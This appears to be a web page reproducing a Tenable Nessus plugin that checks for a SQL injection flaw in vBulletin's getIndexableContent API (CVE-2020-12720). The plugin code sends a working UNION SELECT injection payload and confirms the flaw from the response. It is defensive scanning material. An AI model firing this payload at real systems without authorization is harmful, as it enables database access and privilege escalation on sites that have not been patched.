Lucene search

K
nessusThis script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.VBULLETIN_CVE-2020-12720_DIRECT.NASL
HistoryMay 15, 2020 - 12:00 a.m.

vBulletin 'getIndexableContent' SQL Injection (direct check)

2020-05-1500:00:00
This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
63

The version of vBulletin running on the remote host is affected by an input-validation flaw in the content_infraction/getIndexableContent API that allows for SQL injection. This can be levereged by an attacker to obtain administrator privileges leading to remote code execution.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(136613);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/12/05");

  script_cve_id("CVE-2020-12720");
  script_xref(name:"CEA-ID", value:"CEA-2020-0044");

  script_name(english:"vBulletin 'getIndexableContent' SQL Injection (direct check)");

  script_set_attribute(attribute:"synopsis", value:
"A bulletin board system running on the remote web server has an SQL injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of vBulletin running on the remote host is affected by an input-validation flaw in the
content_infraction/getIndexableContent API that allows for SQL injection. This can be levereged by an attacker to
obtain administrator privileges leading to remote code execution.");
  # https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?185c2276");
  # https://www.tenable.com/blog/cve-2020-12720-vbulletin-urges-users-to-patch-undisclosed-security-vulnerability
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?396e8bf9");
  script_set_attribute(attribute:"see_also", value:"https://twitter.com/Zenofex/status/1260164977077424128");
  script_set_attribute(attribute:"solution", value:
"Upgrade to vBulletin 5.6.1 PL1 or 5.6.0 PL1 or 5.5.6 PL1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-12720");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"vBulletin 5 SQL Injection");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/05/07");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/05/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/05/15");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:vbulletin:vbulletin");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("vbulletin_detect.nasl");
  script_require_keys("www/vBulletin");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("http.inc");
include("webapp_func.inc");

port    = get_http_port(default:80);
install = get_kb_item_or_exit('www/'+port+'/vBulletin');

matches = pregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!matches)
  audit(AUDIT_WEB_APP_NOT_INST, "vBulletin", port);

dir = matches[2];

if (dir !~ '/$')
  dir = dir + '/';

url = dir + 'ajax/api/content_infraction/getIndexableContent';

res = http_send_recv3(
  method:'POST',
  item:url,
  data:'nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(CRC32(\'Nessus\'),\' \',@@version),8,7,6,5,4,3,2,1--',
  add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded', 'X-Requested-With', 'XMLHttpRequest'),
  port:port,
  exit_on_fail:TRUE
);

# CRC32('Nessus') is 1631274700
if ('1631274700' >!< res[2])
  audit(AUDIT_WEB_APP_NOT_AFFECTED, 'vBulletin', build_url(port:port,qs:dir));

report =
  'Nessus was able to verify the issue using the following request :\n\n' +
  http_last_sent_request() + '\n\n' +
  'The above request resulted in the following output :\n\n' +
  res[2] + '\n\n';

security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, sqli:TRUE);


VendorProductVersionCPE
vbulletinvbulletincpe:/a:vbulletin:vbulletin